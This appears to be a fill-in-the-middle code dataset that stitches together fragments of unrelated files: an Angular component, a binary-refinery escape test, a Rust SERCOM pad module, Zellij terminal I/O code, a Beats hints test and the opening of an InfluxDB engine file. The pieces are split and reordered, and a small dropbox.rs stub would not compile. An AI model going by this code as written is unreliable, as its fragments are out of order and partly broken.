public dataContainer: DataContainerService ) {}
ngOnInit(){
this.booksService.getBooks()
.then((books: Book[]) => {
this.books = books;
});
}
switchPage(page:number){
this.currentPage = page;
}
getRatingClass = this.booksService.getRatingClass;
addToBasket= (book: Book) : void => {
this.userService.basket.addProduct(book);
this.router.navigate(['Basket']);
}
}
| Books |
test_esc.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.units.encoding.esc import esc
from .. import TestUnitBase
class TestEscaping(TestUnitBase):
def test_quoted_string_01(self):
unit = esc(quoted=True)
self.assertEqual(unit.process(RB'"r\x65\x66\x69\x6ee\x72\x79"'), B'refinery')
def test_quoted_string_02(self):
unit = esc(quoted=True, hex=True)
result = unit.reverse(RB'refinery')
self.assertEqual(result, BR'"\x72\x65\x66\x69\x6e\x65\x72\x79"')
def test_quoted_string_03(self):
unit = esc(quoted=True, hex=False)
result = unit.reverse(B'binary\n\a\t.."refinery"!')
self.assertEqual(result, BR'"binary\n\a\t..\"refinery\"!"')
def test_quoted_string_04(self):
unit = esc(quoted=True)
with self.assertRaises(ValueError):
unit(RB'"r\x65\x66\x69\x6ee\x72\x79')
def test_inversion_simple(self):
unit = self.load()
data = self.generate_random_buffer(24)
self.assertEqual(data, unit.process(unit.reverse(data)))
def test_unicode(self):
unit = self.load(unicode=True)
data = u'refinery is all about the パイプライン.'.encode('UTF8')
self.assertEqual(data, unit.process(unit.reverse(data)))
def test_reverse(self):
unit = self.load(reverse=True)
data = B'FOO\tBAR\nBAZ\tBOF.\a\a'
self.assertEqual(BR'FOO\tBAR\nBAZ\tBOF.\a\a', unit(data))
def test_escape_not_greedy(self):
unit = self.load()
data = B'H\\x\\y\\x20\\u\\u0020!'
self.assertEqual(unit(data), B'H\\xy \\u \x00!')
def test_escape_greedy(self):
unit = self.load(greedy=True)
data = B'H\\x\\y\\x20\\u\\u0020!'
self.assertEqual(unit(data), B'Hxy u \x00!')
def test_zalgo_t | zalgo_unicode = U'B̘̥̦̣͇̩̱͎̱͑̿̇̅͂ì̢̬̲̪̯̼̠̉͂̾͋͢͢ṋ̷̡̯̰͖͎̲̋̄͌̒͊̍͑̽͛ą̶̮̗̱̗̥̜̙̞̋̑́̀͐̓͋́̇̆r̶̟͇̬̺̙̝̻̪̥̙̽͊͋̔̍̾̒̄y̗̞̠̬̭̖̼̠̣͐̆͂͗͗̀͞ R̻͍̭͚͍̭̤̜̽̿̄́͡é͕̝͚̻̙̤͌̊̇͆͆̆̊͠f̷̨͓̜̣̜͐͛̿̌̉̋̎͜͜ḯ͚̩͈̮̫́̃͂̀͞ǹ̢̫͔̞̝̝̯̼̊̍͗͗̽̽́̿͜͜ẻ̸͚̮̝͎͖̜̻̙̀̔̆̅̆̔̊͞r̸̢̢̻̣̠̈́̂͛̓͋̍̾̌̕͟y̥̖͖̦̼̱̼̜͍͛́́͊͆̐̍̚͠͞'.encode('UTF8')
zalgo_encoded = B''.join([
BR'B\u0351\u033f\u0307\u0305\u0342\u0318\u0325\u0326\u0323\u0347\u0329\u0331\u034e\u0331',
BR'i\u0300\u0309\u0342\u033e\u034b\u032c\u0362\u0332\u032a\u0322\u032f\u033c\u0320\u0362',
BR'n\u030b\u0304\u034c\u0312\u034a\u030d\u0351\u033d\u035b\u032d\u032f\u0321\u0330\u0356\u034e\u0332\u0337',
BR'a\u030b\u0311\u0341\u0340\u0350\u0343\u034b\u0301\u0307\u0306\u0328\u032e\u0317\u0331\u0317\u0325\u031c\u0319\u031e\u0336',
BR'r\u033d\u034a\u034b\u0314\u030d\u033e\u0312\u0304\u031f\u0347\u032c\u033a\u0319\u031d\u033b\u032a\u0325\u0319\u0336',
BR'y\u0350\u035e\u0306\u0342\u0357\u0357\u0300\u0317\u031e\u0320\u032c\u032d\u0316\u033c\u0320\u0323 ',
BR'R\u0361\u033d\u033f\u0304\u0301\u033b\u034d\u032d\u035a\u034d\u032d\u0324\u031c',
BR'e\u0360\u0301\u034c\u030a\u0307\u0346\u0346\u0306\u030a\u0355\u031d\u035a\u033b\u0319\u0324',
BR'f\u0350\u035b\u033f\u030c\u0309\u030b\u030e\u0328\u0353\u035c\u031c\u035c\u0323\u031c\u0337',
BR'i\u0344\u0341\u0303\u0342\u035e\u0300\u035a\u0329\u0348\u032e\u032b',
BR'n\u0300\u030a\u030d\u0357\u0357\u033d\u033d\u0301\u033f\u032b\u0354\u031e\u035c\u031d\u031d\u035c\u0322\u032f\u033c',
BR'e\u0309\u0300\u0314\u0306\u035e\u0305\u0306\u0314\u030a\u035a\u032e\u031d\u034e\u0356\u031c\u033b\u0319\u0338',
BR'r\u0344\u0302\u0315\u035b\u0343\u034b\u030d\u033e\u030c\u033b\u0322\u0322\u0323\u035f\u0320\u0338',
BR'y\u035b\u0301\u031a\u0301\u034a\u0360\u0346\u0310\u030d\u035e\u0325\u0316\u0356\u0326\u033c\u0331\u033c\u031c\u034d'
])
unit = self.load(unicode=True)
self.assertEqual(zalgo_unicode, unit(zalgo_encoded))
| ext(self):
|
pad.rs | //! Type-level tools to configure SERCOM pads
//!
//! This module helps configure [`Pin`]s as SERCOM pads. It provides type-level
//! tools to convert `Pin`s to the correct [`PinMode`] and to enforce type-level
//! constraints at compile-time.
//!
//! # Overview
//!
//! A SERCOM pad is defined by two types, its corresponding [`Sercom`] instance
//! and its [`PadNum`], from [`Pad0`] to [`Pad3`]. However, a given SERCOM pad
//! can usually be mapped to several possible [`PinId`]s.
//!
//! There are two primary traits defined in this module:
//! - The [`IsPad`] trait is implemented on `Pin` types that are properly
//! configured as SERCOM pads, with `PinMode` [`AlternateC`] or
//! [`AlternateD`]. It acts as both a [type class] for SERCOM pads and as a
//! [type-level function] to recover the corresponding [`Sercom`] and
//! [`PadNum`] types from the `Pin`.
//! - The [`GetPad`] trait maps each [`PinId`] to its corresponding, pad-related
//! types. The [`PadMode`] alias uses `GetPad` to recover the corresponding
//! `PinMode` for a given SERCOM pad, while the [`Pad`] alias recovers the
//! configured [`Pin`] type.
//!
//! [`AlternateC`]: crate::gpio::v2::AlternateC
//! [`AlternateD`]: crate::gpio::v2::AlternateD
//! [type class]: crate::typelevel#type-classes
//! [type-level function]: crate::typelevel#type-level-functions
#![cfg_attr(
feature = "min-samd51g",
doc = "
# IOSET\n
\n
SAMx5x chips do not allow arbitrary combinations of `PinId` for a given
SERCOM. Instead, all `PinId`s must belong to the same IOSET. This module
defines a [type-level enum], [`IoSet`], to enforce this restriction, and the
[`InIoSet`] [type class] is responsible for labeling each `IsPad` type with
its corresponding, valid `IoSet`\\(s).\n
\n
"
)]
use paste::paste;
use seq_macro::seq;
use super::Sercom;
#[cfg(not(feature = "samd11"))]
use crate::gpio::v2::OptionalPinId;
use crate::gpio::v2::{AnyPin, OptionalPin, Pin, PinId, PinMode};
use crate::typelevel::{NoneT, Sealed};
#[cfg(any(feature = "samd11", feature = "samd21"))]
#[path = "pad/impl_pad_thumbv6m.rs"]
mod impl_pad;
#[cfg(feature = "min-samd51g")]
#[path = "pad/impl_pad_thumbv7em.rs"]
mod impl_pad;
//==============================================================================
// PadNum
//==============================================================================
/// Type-level enum representing a SERCOM pad number
///
/// It has variants [`Pad0`], [`Pad1`], [`Pad2`] & [`Pad3`]. See the [type-level
/// enum] documentation for an explanation of the pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub trait PadNum: Sealed {}
seq!(N in 0..=3 {
paste! {
#[doc = "Type-level variant of [`PadNum`] representing SERCOM pad " N]
///
/// See the [type-level enum] documentation for an explanation of the
/// pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum Pad #N {}
impl Sealed for Pad #N {}
impl PadNum for Pad #N {}
}
});
//==============================================================================
// OptionalPadNum
//==============================================================================
/// Type-level equivalent of `Option<PadNum>`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
///
/// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait OptionalPadNum: Sealed {}
impl OptionalPadNum for NoneT {}
impl<N: PadNum> OptionalPadNum for N {}
//==============================================================================
// IsPad
//==============================================================================
/// Type class for [`Pin`]s configured as SERCOM pads
///
/// This trait serves as both a [type class] for `Pin`s configured as SERCOM
/// pads and as a [type-level function] mapping each `Pin` type to its
/// corresponding [`Sercom`] and [`PadNum`].
///
/// [type class]: crate::typelevel#type-classes
/// [type-level function]: crate::typelevel#type-level-functions
pub trait IsPad: AnyPin {
type Sercom: Sercom;
type PadNum: PadNum;
}
//==============================================================================
// OptionalPad
//==============================================================================
/// Type-level equivalent of `Option<Pad>`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
/// |
impl OptionalPad for NoneT {
type PadNum = NoneT;
}
impl<P: IsPad> OptionalPad for P {
type PadNum = P::PadNum;
}
/// Type-level equivalent of `Some(Pad)`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
///
/// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait SomePad: IsPad {}
impl<P: IsPad> SomePad for P {}
//==============================================================================
// GetPad
//==============================================================================
/// Type-level function mapping [`PinId`]s to SERCOM-pad-related types
///
/// For SAMD21 and SAMx5x chips, a [`Sercom`] and a [`PinId`] is enough
/// information to uniquely identify a pad, so this trait returns the
/// corresponding [`PadNum`] and [`PinMode`].
///
/// For SAMD11 chips, on the other hand, some `PinId`s can serve as two
/// different `PadNum`s for the *same* `Sercom`. For these chips, `GetPad`
/// requires a second type parameter to specify the `PadNum` and only returns
/// the `PinMode`.
///
/// See the documentation on [type-level functions] for more details.
///
/// [type-level functions]: crate::typelevel#type-level-functions
#[cfg(feature = "samd11")]
pub trait GetPad<S, N>
where
S: Sercom,
N: PadNum,
Self: PinId,
{
type PinMode: PinMode;
}
/// Type-level function mapping [`PinId`]s to SERCOM-pad-related types
///
/// For SAMD21 and SAMx5x chips, a [`Sercom`] and a [`PinId`] is enough
/// information to uniquely identify a pad, so this trait returns the
/// corresponding [`PadNum`] and [`PinMode`].
///
/// For SAMD11 chips, on the other hand, some `PinId`s can serve as two
/// different `PadNum`s for the *same* `Sercom`. For these chips, `GetPad`
/// requires a second type parameter to specify the `PadNum` and only returns
/// the `PinMode`.
///
/// See the documentation on [type-level functions] for more details.
///
/// [type-level functions]: crate::typelevel#type-level-functions
#[cfg(not(feature = "samd11"))]
pub trait GetPad<S>
where
S: Sercom,
Self: PinId,
{
type PadNum: PadNum;
type PinMode: PinMode;
}
//==============================================================================
// GetPad aliases
//==============================================================================
/// Type alias using [`GetPad`] to recover the [`PinMode`] for a given SERCOM
/// pad
#[cfg(feature = "samd11")]
pub type PadMode<S, N, I> = <I as GetPad<S, N>>::PinMode;
/// Type alias using [`GetPad`] to recover the [`PinMode`] for a given SERCOM
/// pad
#[cfg(not(feature = "samd11"))]
pub type PadMode<S, I> = <I as GetPad<S>>::PinMode;
/// Type alias to recover a [`Pin`] configured as a SERCOM pad in the correct
/// [`PadMode`]
#[cfg(feature = "samd11")]
pub type Pad<S, N, I> = Pin<I, PadMode<S, N, I>>;
/// Type alias to recover a [`Pin`] configured as a SERCOM pad in the correct
/// [`PadMode`]
#[cfg(not(feature = "samd11"))]
pub type Pad<S, I> = Pin<I, PadMode<S, I>>;
//==============================================================================
// GetOptionalPad
//==============================================================================
/// Type-level function mapping [`OptionalPinId`]s to their corresponding
/// [`OptionalPad`]s
///
/// This trait acts as a [type-level function] mapping `OptionalPinId`s to their
/// corresponding `OptionalPad`. In pseudo-Rust, it is the type-level equivalent
/// of starting with `Option<PinId>` and calling `.map(GetPad)` to recover an
/// `Option<Pad>`.
///
/// [type-level functions]: crate::typelevel#type-level-functions
#[cfg(not(feature = "samd11"))]
pub trait GetOptionalPad<S: Sercom>: OptionalPinId {
type PadNum: OptionalPadNum;
type Pad: OptionalPad;
}
#[cfg(not(feature = "samd11"))]
impl<S: Sercom> GetOptionalPad<S> for NoneT {
type PadNum = NoneT;
type Pad = NoneT;
}
#[cfg(not(feature = "samd11"))]
impl<S, I> GetOptionalPad<S> for I
where
S: Sercom,
I: PinId + GetPad<S>,
Pad<S, I>: IsPad,
{
type PadNum = I::PadNum;
type Pad = Pad<S, I>;
}
//==============================================================================
// IoSet
//==============================================================================
#[cfg(feature = "min-samd51g")]
mod ioset {
use super::*;
/// Type-level enum representing a SERCOM IOSET
///
/// See the [type-level enum] documentation for more details on the pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub trait IoSet: Sealed {}
seq!(N in 1..=6 {
paste! {
#[doc = "Type-level variant of [`IoSet`] representing SERCOM IOSET " N]
///
/// See the [type-level enum] documentation for more details on the
/// pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum IoSet #N {}
impl Sealed for IoSet #N {}
impl IoSet for IoSet #N {}
}
});
/// Type-level variant of [`IoSet`] representing an undocumented SERCOM
/// IOSET
///
/// After implementing `IoSet` type checking, it became clear that some
/// existing boards were using a combinations of pins that did not match any
/// IOSET in the datasheet. From that, we infer that there must be at least
/// one undocumented IOSET, and we added this new `IoSet` to account for it.
///
/// As of writing this documentation, only one undocumented IOSET has been
/// discovered: PA16, PA17, PB22 & PB23 configured for `Sercom1`. Both the
/// pygamer & feather_m4 uses this combination.
///
/// See the [type-level enum] documentation for more details on type-level
/// variants.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum UndocIoSet1 {}
impl Sealed for UndocIoSet1 {}
impl IoSet for UndocIoSet1 {}
/// Type class for SERCOM pads in a given [`IoSet`]
///
/// This trait is used to label each [`Pin`] implementing [`IsPad`] with its
/// corresponding [`IoSet`]\(s). Downstream types can use this trait as a
/// [type class] to restrict [`Pin`]s to a given [`IoSet`]. See the [type
/// class] documentation for more details on the pattern.
///
/// [type class]: crate::typelevel#type-classes
pub trait InIoSet<I>
where
Self: IsPad,
I: IoSet,
{
}
}
#[cfg(feature = "min-samd51g")]
pub use ioset::*; | /// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait OptionalPad: OptionalPin {
type PadNum: OptionalPadNum;
} |
dropbox.rs | use reqwest;
fn dropbox() {
let body = reqwest::get("https://www.rust-lang.org")?
.text()?;
println!("body = {:?}", body);
}
fn main() | {
dropbox();
} |
|
os_input_output.rs | use std::collections::HashMap;
use crate::panes::PaneId;
use std::env;
use std::os::unix::io::RawFd;
use std::os::unix::process::CommandExt;
use std::path::PathBuf;
use std::process::{Child, Command};
use std::sync::{Arc, Mutex};
use zellij_utils::{async_std, interprocess, libc, nix, signal_hook, zellij_tile};
use async_std::fs::File as AsyncFile;
use async_std::os::unix::io::FromRawFd;
use interprocess::local_socket::LocalSocketStream;
use sysinfo::{ProcessExt, ProcessRefreshKind, System, SystemExt};
use nix::pty::{openpty, OpenptyResult, Winsize};
use nix::sys::signal::{kill, Signal};
use nix::sys::termios;
use nix::unistd;
use signal_hook::consts::*;
use zellij_tile::data::Palette;
use zellij_utils::{
input::command::{RunCommand, TerminalAction},
ipc::{ClientToServerMsg, IpcReceiverWithContext, IpcSenderWithContext, ServerToClientMsg},
shared::default_palette,
};
use async_std::io::ReadExt;
pub use async_trait::async_trait;
pub use nix::unistd::Pid;
use crate::ClientId;
pub(crate) fn set_terminal_size_using_fd(fd: RawFd, columns: u16, rows: u16) {
// TODO: do this with the nix ioctl
use libc::ioctl;
use libc::TIOCSWINSZ;
let winsize = Winsize {
ws_col: columns,
ws_row: rows,
ws_xpixel: 0,
ws_ypixel: 0,
};
// TIOCGWINSZ is an u32, but the second argument to ioctl is u64 on
// some platforms. When checked on Linux, clippy will complain about
// useless conversion.
#[allow(clippy::useless_conversion)]
unsafe {
ioctl(fd, TIOCSWINSZ.into(), &winsize)
};
}
/// Handle some signals for the child process. This will loop until the child
/// process exits.
fn handle_command_exit(mut child: Child) {
let mut should_exit = false;
let mut attempts = 3;
let mut signals = signal_hook::iterator::Signals::new(&[SIGINT, SIGTERM]).unwrap();
'handle_exit: loop {
// test whether the child process has exited
match child.try_wait() {
Ok(Some(_status)) => {
// if the child process has exited, break outside of the loop
// and exit this function
// TODO: handle errors?
break 'handle_exit;
}
Ok(None) => {
::std::thread::sleep(::std::time::Duration::from_millis(10));
}
Err(e) => panic!("error attempting to wait: {}", e),
}
if !should_exit {
for signal in signals.pending() {
if signal == SIGINT || signal == SIGTERM {
should_exit = true;
}
}
} else if attempts > 0 {
// let's try nicely first...
attempts -= 1;
kill(Pid::from_raw(child.id() as i32), Some(Signal::SIGTERM)).unwrap();
continue;
} else {
// when I say whoa, I mean WHOA!
let _ = child.kill();
break 'handle_exit;
}
}
}
fn handle_openpty(
open_pty_res: OpenptyResult,
cmd: RunCommand,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
// primary side of pty and child fd
let pid_primary = open_pty_res.master;
let pid_secondary = open_pty_res.slave;
let mut child = unsafe {
let command = &mut Command::new(cmd.command);
if let Some(current_dir) = cmd.cwd {
if current_dir.exists() {
command.current_dir(current_dir);
}
}
command
.args(&cmd.args)
.pre_exec(move || -> std::io::Result<()> {
if libc::login_tty(pid_secondary) != 0 {
panic!("failed to set controlling terminal");
}
close_fds::close_open_fds(3, &[]);
Ok(())
})
.spawn()
.expect("failed to spawn")
};
let child_id = child.id();
std::thread::spawn(move || {
child.wait().unwrap();
handle_command_exit(child);
let _ = nix::unistd::close(pid_primary);
let _ = nix::unistd::close(pid_secondary);
quit_cb(PaneId::Terminal(pid_primary));
});
(pid_primary, child_id as RawFd)
}
/// Spawns a new terminal from the parent terminal with [`termios`](termios::Termios)
/// `orig_termios`.
///
fn handle_terminal(
cmd: RunCommand,
orig_termios: termios::Termios,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
// Create a pipe to allow the child the communicate the shell's pid to it's
// parent.
match openpty(None, Some(&orig_termios)) {
Ok(open_pty_res) => handle_openpty(open_pty_res, cmd, quit_cb),
Err(e) => {
panic!("failed to start pty{:?}", e);
}
}
}
/// If a [`TerminalAction::OpenFile(file)`] is given, the text editor specified by environment variable `EDITOR`
/// (or `VISUAL`, if `EDITOR` is not set) will be started in the new terminal, with the given
/// file open.
/// If [`TerminalAction::RunCommand(RunCommand)`] is given, the command will be started
/// in the new terminal.
/// If None is given, the shell specified by environment variable `SHELL` will
/// be started in the new terminal.
///
/// # Panics
///
/// This function will panic if both the `EDITOR` and `VISUAL` environment variables are not
/// set.
pub fn spawn_terminal(
terminal_action: TerminalAction,
orig_termios: termios::Termios,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
let cmd = match terminal_action {
TerminalAction::OpenFile(file_to_open) => { | PathBuf::from(env::var("EDITOR").unwrap_or_else(|_| env::var("VISUAL").unwrap()));
let args = vec![file_to_open
.into_os_string()
.into_string()
.expect("Not valid Utf8 Encoding")];
RunCommand {
command,
args,
cwd: None,
}
}
TerminalAction::RunCommand(command) => command,
};
handle_terminal(cmd, orig_termios, quit_cb)
}
#[derive(Clone)]
pub struct ServerOsInputOutput {
orig_termios: Arc<Mutex<termios::Termios>>,
client_senders: Arc<Mutex<HashMap<ClientId, IpcSenderWithContext<ServerToClientMsg>>>>,
}
// async fn in traits is not supported by rust, so dtolnay's excellent async_trait macro is being
// used. See https://smallcultfollowing.com/babysteps/blog/2019/10/26/async-fn-in-traits-are-hard/
#[async_trait]
pub trait AsyncReader: Send + Sync {
async fn read(&mut self, buf: &mut [u8]) -> Result<usize, std::io::Error>;
}
/// An `AsyncReader` that wraps a `RawFd`
struct RawFdAsyncReader {
fd: async_std::fs::File,
}
impl RawFdAsyncReader {
fn new(fd: RawFd) -> RawFdAsyncReader {
RawFdAsyncReader {
/// The supplied `RawFd` is consumed by the created `RawFdAsyncReader`, closing it when dropped
fd: unsafe { AsyncFile::from_raw_fd(fd) },
}
}
}
#[async_trait]
impl AsyncReader for RawFdAsyncReader {
async fn read(&mut self, buf: &mut [u8]) -> Result<usize, std::io::Error> {
self.fd.read(buf).await
}
}
/// The `ServerOsApi` trait represents an abstract interface to the features of an operating system that
/// Zellij server requires.
pub trait ServerOsApi: Send + Sync {
/// Sets the size of the terminal associated to file descriptor `fd`.
fn set_terminal_size_using_fd(&self, fd: RawFd, cols: u16, rows: u16);
/// Spawn a new terminal, with a terminal action. The returned tuple contains the master file
/// descriptor of the forked psuedo terminal and a [ChildId] struct containing process id's for
/// the forked child process.
fn spawn_terminal(
&self,
terminal_action: TerminalAction,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd);
/// Read bytes from the standard output of the virtual terminal referred to by `fd`.
fn read_from_tty_stdout(&self, fd: RawFd, buf: &mut [u8]) -> Result<usize, nix::Error>;
/// Creates an `AsyncReader` that can be used to read from `fd` in an async context
fn async_file_reader(&self, fd: RawFd) -> Box<dyn AsyncReader>;
/// Write bytes to the standard input of the virtual terminal referred to by `fd`.
fn write_to_tty_stdin(&self, fd: RawFd, buf: &[u8]) -> Result<usize, nix::Error>;
/// Wait until all output written to the object referred to by `fd` has been transmitted.
fn tcdrain(&self, fd: RawFd) -> Result<(), nix::Error>;
/// Terminate the process with process ID `pid`. (SIGTERM)
fn kill(&self, pid: Pid) -> Result<(), nix::Error>;
/// Terminate the process with process ID `pid`. (SIGKILL)
fn force_kill(&self, pid: Pid) -> Result<(), nix::Error>;
/// Returns a [`Box`] pointer to this [`ServerOsApi`] struct.
fn box_clone(&self) -> Box<dyn ServerOsApi>;
fn send_to_client(&self, client_id: ClientId, msg: ServerToClientMsg);
fn new_client(
&mut self,
client_id: ClientId,
stream: LocalSocketStream,
) -> IpcReceiverWithContext<ClientToServerMsg>;
fn remove_client(&mut self, client_id: ClientId);
fn load_palette(&self) -> Palette;
/// Returns the current working directory for a given pid
fn get_cwd(&self, pid: Pid) -> Option<PathBuf>;
}
impl ServerOsApi for ServerOsInputOutput {
fn set_terminal_size_using_fd(&self, fd: RawFd, cols: u16, rows: u16) {
if cols > 0 && rows > 0 {
set_terminal_size_using_fd(fd, cols, rows);
}
}
fn spawn_terminal(
&self,
terminal_action: TerminalAction,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
let orig_termios = self.orig_termios.lock().unwrap();
spawn_terminal(terminal_action, orig_termios.clone(), quit_cb)
}
fn read_from_tty_stdout(&self, fd: RawFd, buf: &mut [u8]) -> Result<usize, nix::Error> {
unistd::read(fd, buf)
}
fn async_file_reader(&self, fd: RawFd) -> Box<dyn AsyncReader> {
Box::new(RawFdAsyncReader::new(fd))
}
fn write_to_tty_stdin(&self, fd: RawFd, buf: &[u8]) -> Result<usize, nix::Error> {
unistd::write(fd, buf)
}
fn tcdrain(&self, fd: RawFd) -> Result<(), nix::Error> {
termios::tcdrain(fd)
}
fn box_clone(&self) -> Box<dyn ServerOsApi> {
Box::new((*self).clone())
}
fn kill(&self, pid: Pid) -> Result<(), nix::Error> {
let _ = kill(pid, Some(Signal::SIGHUP));
Ok(())
}
fn force_kill(&self, pid: Pid) -> Result<(), nix::Error> {
let _ = kill(pid, Some(Signal::SIGKILL));
Ok(())
}
fn send_to_client(&self, client_id: ClientId, msg: ServerToClientMsg) {
if let Some(sender) = self.client_senders.lock().unwrap().get_mut(&client_id) {
sender.send(msg);
}
}
fn new_client(
&mut self,
client_id: ClientId,
stream: LocalSocketStream,
) -> IpcReceiverWithContext<ClientToServerMsg> {
let receiver = IpcReceiverWithContext::new(stream);
let sender = receiver.get_sender();
self.client_senders
.lock()
.unwrap()
.insert(client_id, sender);
receiver
}
fn remove_client(&mut self, client_id: ClientId) {
let mut client_senders = self.client_senders.lock().unwrap();
if client_senders.contains_key(&client_id) {
client_senders.remove(&client_id);
}
}
fn load_palette(&self) -> Palette {
default_palette()
}
fn get_cwd(&self, pid: Pid) -> Option<PathBuf> {
let mut system_info = System::new();
// Update by minimizing information.
// See https://docs.rs/sysinfo/0.22.5/sysinfo/struct.ProcessRefreshKind.html#
system_info.refresh_processes_specifics(ProcessRefreshKind::default());
if let Some(process) = system_info.process(pid.into()) {
return Some(process.cwd().to_path_buf());
}
None
}
}
impl Clone for Box<dyn ServerOsApi> {
fn clone(&self) -> Box<dyn ServerOsApi> {
self.box_clone()
}
}
pub fn get_server_os_input() -> Result<ServerOsInputOutput, nix::Error> {
let current_termios = termios::tcgetattr(0)?;
let orig_termios = Arc::new(Mutex::new(current_termios));
Ok(ServerOsInputOutput {
orig_termios,
client_senders: Arc::new(Mutex::new(HashMap::new())),
})
}
/// Process id's for forked terminals
#[derive(Debug)]
pub struct ChildId {
/// Primary process id of a forked terminal
pub primary: Pid,
/// Process id of the command running inside the forked terminal, usually a shell. The primary
/// field is it's parent process id.
pub shell: Option<Pid>,
}
#[cfg(test)]
#[path = "./unit/os_input_output_tests.rs"]
mod os_input_output_tests; | if env::var("EDITOR").is_err() && env::var("VISUAL").is_err() {
panic!("Can't edit files if an editor is not defined. To fix: define the EDITOR or VISUAL environment variables with the path to your editor (eg. /usr/bin/vim)");
}
let command = |
monitors_test.go | // Licensed to Elasticsearch B.V. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. Elasticsearch B.V. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package hints
import (
"testing"
"github.com/stretchr/testify/assert"
"github.com/snappyflow/beats/v7/libbeat/common"
"github.com/snappyflow/beats/v7/libbeat/common/bus"
"github.com/snappyflow/beats/v7/libbeat/logp"
)
func | (t *testing.T) {
tests := []struct {
message string
event bus.Event
len int
result common.MapStr
}{
{
message: "Empty event hints should return empty config",
event: bus.Event{
"host": "1.2.3.4",
"kubernetes": common.MapStr{
"container": common.MapStr{
"name": "foobar",
"id": "abc",
},
},
"docker": common.MapStr{
"container": common.MapStr{
"name": "foobar",
"id": "abc",
},
},
},
len: 0,
result: common.MapStr{},
},
{
message: "Hints without host should return nothing",
event: bus.Event{
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
},
},
},
len: 0,
result: common.MapStr{},
},
{
message: "Hints without matching port should return nothing in the hosts section",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888",
},
},
},
len: 1,
result: common.MapStr{
"schedule": "@every 5s",
"type": "icmp",
},
},
{
message: "Hints with multiple hosts return only the matching one",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
{
message: "Hints with multiple hosts return only the one with the template",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:${data.port}",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
{
message: "Monitor defined in monitors as a JSON string should return a config",
event: bus.Event{
"host": "1.2.3.4",
"hints": common.MapStr{
"monitor": common.MapStr{
"raw": "{\"enabled\":true,\"type\":\"icmp\",\"schedule\":\"@every 20s\",\"timeout\":\"3s\"}",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"timeout": "3s",
"schedule": "@every 20s",
"enabled": true,
},
},
{
message: "Monitor with processor config must return an module having the processor defined",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:9090",
"processors": common.MapStr{
"add_locale": common.MapStr{
"abbrevation": "MST",
},
},
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"hosts": []interface{}{"1.2.3.4:9090"},
"schedule": "@every 5s",
"processors": []interface{}{
map[string]interface{}{
"add_locale": map[string]interface{}{
"abbrevation": "MST",
},
},
},
},
},
{
message: "Hints with multiple monitors should return multiple",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"1": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
"2": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
},
},
},
len: 2,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
}
for _, test := range tests {
m := heartbeatHints{
config: defaultConfig(),
logger: logp.NewLogger("hints.builder"),
}
cfgs := m.CreateConfig(test.event)
assert.Equal(t, len(cfgs), test.len, test.message)
if len(cfgs) != 0 {
config := common.MapStr{}
err := cfgs[0].Unpack(&config)
assert.Nil(t, err, test.message)
assert.Equal(t, test.result, config, test.message)
}
}
}
| TestGenerateHints |
engine.go | // Package tsm1 provides a TSDB in the Time Structured Merge tree format.
package tsm1 // import "github.com/influxdata/influxdb/v2/tsdb/engine/tsm1"
import (
"archive/tar"
"bytes"
"context"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"os"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/influxdata/influxdb/v2/influxql/query"
"github.com/influxdata/influxdb/v2/logger"
"github.com/influxdata/influxdb/v2/models"
"github.com/influxdata/influxdb/v2/pkg/bytesutil"
"github.com/influxdata/influxdb/v2/pkg/estimator"
